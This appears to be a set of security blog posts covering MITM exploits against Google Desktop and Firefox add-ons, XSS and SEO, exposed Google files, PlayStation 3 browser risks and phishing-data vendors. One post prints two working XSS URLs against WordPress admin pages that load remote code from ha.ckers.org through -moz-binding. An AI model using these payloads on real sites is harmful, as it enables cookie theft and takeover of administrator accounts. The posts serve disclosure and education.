Well fast on the heels of the Firefox plugin MITM vulnerabilities I’ve been working on some other stuff that I think is interesting and of the same genre. This time I came up with a MITM exploit against Google Desktop that would allow an attacker to trick a user into running any program they have installed and that was indexed by Google Desktop. Nasty. I have a pretty thorough writup and a sample video (please read the text before you launch the video or it won’t make much sense).

Using something like Airpwn an attacker can sit in a wireless hotspot and wait for someone who has Google desktop installed (since we can detect for that) and run the exploit against them. It could be done as a prank or something malicious. The point being these types of deep integration between the web and client side applications is really dangerous and breaks the security models put in place by the browsers.

I found this interesting link in my logs to the University of Washington’s CS department coursework. Apparently their assignment (due tomorrow) is to actually get their professors to give up their fake credentials by getting them to click on links. Pretty interesting actually! I’m surprised to see this kind of stuff being taught, but I’m really glad too, because a lot of what XSS is is input validation basics. It’s exactly the sort of thing that needs to be taught in CS classes, and it’s one that has somehow evaded most schools.

The intense irony in finding this is not lost on me though - I actually failed out of school and now my site is recommended course reading for CSE 490K (an advanced CS class). Maybe I should ask for course credit! Now don’t go and help the students! They have to learn this stuff for themselves!

Brian Krebs at the Washington Post had a story about a post by Chris Soghoian who found that you can use a MITM attack to overwrite addons in Firefox. Actually, believe it or not, I was planning on releasing the exact same issue, but alas, that’s what I get for waiting. More than one person heard me say this, and I even sent Jeremiah a power point deck on this exact thing last night, and even mentioned it in passing during my OWASP talk yesterday, so I’m not just blowing smoke, but alas, Chris disclosed it first so he wins, and good for him. Chris did a good job of explaining it in gory detail too. While most addons are put on addons.mozilla.org there are quite a few that are pulled straight from http connections. There’s a great idea - let’s run arbitrary code from untrusted resources!

The offenders range from big companies like Google, Yahoo, and Facebook, to security software like Netcraft’s toolbar and the Phishtank’s toolbar down to little addons like Bugmenot, and Localrodeo. If you use Firefox, it’s time to either uninstall those addons if you are at all concerned about man in the middle attacks over wireless connections. If you use a laptop and have those addons installed you are taking a big risk of complete compromise. Yes, this is nasty. Daniel Veditz said they would have expected people would have known better. This is sort of one of those things that if you don’t warn people at a minimum they won’t know to think twice. Mozilla may “block” all unsecured content. While I don’t think that’s a great idea, at least they could warn people about what they are doing. Good work by Chris - I just wish I had disclosed it first!

There’s an interesting post over at Venture Skills blog talking about if XSS is actually good for SEO purposes. While I don’t have any conclusive evidence that he is wrong or right (at least nothing that makes me satisfied by saying that is a correct or incorrect assessment), I will say I have seen evidence that blackhats definitely are using this and search engines definitely are indexing them.

I have also heard blackhat say that it works best when used as a “spice” within a mix of a lot of other normal links, rather then relying on them entirely. Again, I have no evidence that that is true or not, but I wouldn’t refute other people’s experience without evidence. One thing I think is important to mention is that XSS as it stands is NOT good for SEO, nor could it be. What blackhats use is HTML injection, not JavaScript injection. Also, it should be noted that XSS takes on three forms, only one of which is almost hopeless for a search engine to prevent and that is stored XSS. What I will say is it should be pretty easy for search engines to set up rules looking for commonly used reflected HTML injection techniques and devalue them.

Ronald had a really good post about how Google’s files were open to the world. A few people messaged me and said they were surprised I didn’t jump on it the second it was mentioned. Yah, I know, I probably should have, but get this, I actually felt sorry for Google. I know, call me a big softy. And it’s not because I’m working for Google, so don’t get your panties in a bunch here.

But no, think about the vast surface area that Google has to protect. It’s incredible when you think about it. Missing a single file permission can really ruin your day when you are a multi-national corporation. Okay, enough coddling Google, let me go back to my hard-line stance. Google has a responsibility to be better about this than most people. Why? Because they have more market share. They cannot mess up. They don’t have the right to.

If some tiny mom and pop web-store has this issue it’s bad. If Google has it, it could affect hundreds of millions of people. Sorry, that’s just not allowed. This was a security 101 mistake, and it’s unknown what sort of damage it could have caused. The fact that this has not already shown up on Google’s new security blog is testament to how impotent it probably will end up being. It’s tough to talk about your own problems when you’re the best and the brightest. That’s a big pill to swallow.

Anathema sent me a link to a few posts he made to discuss PlayStation 3 hacking. This post is on possible PlayStation 3 exploits and this one is on PlayStation denial of service and memory exhaustion. Why do I care, you ask? Clearly I’m not a hardware guy and I can’t remember the last time I bought a video game. But, I am interested because the PlayStation 3 has an integrated browser (based off the NetFront browser).

The reason this is interesting to me is because more and more devices are becoming web enabled. Whether that means they run webservers or have browsers built into them, the point is the same. They are sitting out there, making or taking requests from who knows where, with unknown protection and with unknown ability to do or perform other actions. Let’s say for a second that PS3 was sitting behind a firewall of someone who worked at supersecurecompany.com and they use a VPN only to connect to their company. Now that I am running my code on that system, I could theoretically break into other machines on the network much easier since I am behind the firewall. This is far more nasty than I think most people realize. It might be a video game console but if it is web enabled and running over a shared internet line it should be just as secure as anything else.

After reading a comment by David Ulevitch on a post by Dragos Lungu I was pretty interested in reading a new press release from OpenDNS on how they are “partnering” with the anti phishing work group (APWG). I actually laughed when I read it for a few reasons. Firstly, if you read Dave Jevans’ comment he says, “We are pleased to welcome PhishTank.com as a member of the APWG.” To me that seems less like a partner and more like a client. I couldn’t find any supporting words on APWG’s website at all to confirm a partnership in any capacity. To me it sounds like OpenDNS is simply going to consume data from APWG.

Secondly, this affirms what I was trying to get across in my comments on my post about the phishtank’s competitive nature with APWG. Although David Ulevitch never answered my questions posed to him in the comments, this pretty much sums up what I was saying. Unless these players start working together, they are only causing more churn in the industry as more companies have to deal with more anti-phishing aggregators. That in turn means that companies trying to protect themselves or their consumers have to build more APIs, sign more contracts or whatever, just to get the global knowledge of where phishing sites are. So, ultimately this sounds like a good thing, although I’m skeptical of how much a partnership this really is, given Dave Jevans’ comments. It sounds more like they are just a simple consumer/submitter, just like the other APWG members, but the press release may also just be poorly written.

This will be a quicky post as it was more just something I laughed at when I saw it. I ran across an obfuscation inconsistency that made me laugh out loud. If you click on one of Security Focus’s posts you’ll see something like this:

Cold Fusion Scan
by icos (at) arez (dot) com [email concealed]

Then if you click on the threaded version of the same post you see this:

Cold Fusion Scan
by icos@arez.com

Silly mistake that is happily leaking all the people’s email addresses who post to the mailing lists to spiders and robots. Wonder why you are getting so much spam? Hope they fix this, not that it makes much difference now. Time to retire that email address!

As I’m getting more and more divergent from the original Wordpress codebase, I am finding more and more things wrong with it. So expect more of these as I dissect the code. Frankly, I’m pretty appalled at how a lot of it is written - you’d think after all these years the shock of how people code would wear off on me, but it never does. Anyway, in the latest round of me cleaning up the code, I found a few more vulnerabilities. I have no idea what versions this affects, so your mileage may vary. Here are the two XSS exploits against logged in administrators (this version of the exploit works only against Firefox, but you could easily modify it for IE too):

http://www.site.com/path.to/wp-admin/post-new.php?text=&popupurl=http%3A%2F%2Fha.ckers.org%2Fxss.html&popuptitle=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'
http://www.site.com/path.to/wp-admin/post-new.php?text=&popupurl=http%3A%2F%2Fha.ckers.org%2Fxss.html&post_title=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'

If an attacker could get the administrators to click on this link it could allow the attacker to steal cookies, read nonces for writing posts, moderating comments, writing their own PHP files, or worse. This isn’t really news, except that I want to make it clear for those of you who use Wordpress because you seeing me use it that I’m no longer using the same code base, any of the included JS/WYSIWYG stuff or any of the modules. With all the vulnerabilities over the last few months and the constant upgrading, I just don’t trust it as a reliable platform anymore. So welcome to ha.CkersPress.

This morning I thought I had a great idea, but it turns out I didn’t. I thought you may be able to include malicious JavaScript into any board that allows images, by modifying the headers to contain JavaScript. It turns out that was a wild goose chace. However, I was able to get JavaScript to render in headers of things like images click here to see the demo (follow the instructions on the page).

I can’t see any simple way to exploit this directly, other than by social engineering people to go to images that look otherwise benign. When images are too small to be seen properly often times people will include a link to enlarge to the original size, and that would allow you to run JS in Firefox through the headers. Anyway, maybe someone else can think of something useful to do with this beyond social engineering.